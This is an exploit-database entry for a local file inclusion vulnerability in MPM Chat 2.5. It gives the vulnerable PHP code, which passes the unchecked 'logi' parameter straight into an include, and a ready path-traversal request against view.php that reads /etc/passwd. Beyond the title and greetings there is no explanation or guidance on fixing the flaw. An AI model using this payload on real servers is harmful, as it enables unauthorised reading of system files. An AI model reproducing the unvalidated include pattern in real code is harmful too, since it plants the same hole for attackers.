id: 1605
date: 03/17/2007
title: MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
author: GoLd_M
cves: 

=============================================================
MPM Chat 2.5 (view.php logi) Local File Include Vulnerability
=============================================================



# MPM Chat 2.5 (view.php logi) Local File Include Exploit
# Discovered by: GloD_M = [Mahmood_ali]
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
<?php
if ($logi != '') {
include 'archive/' . $logi;
#Exploit: /[path]/view.php?logi=../../../../../etc/passwd



#  0day.today [2023-03-25]  #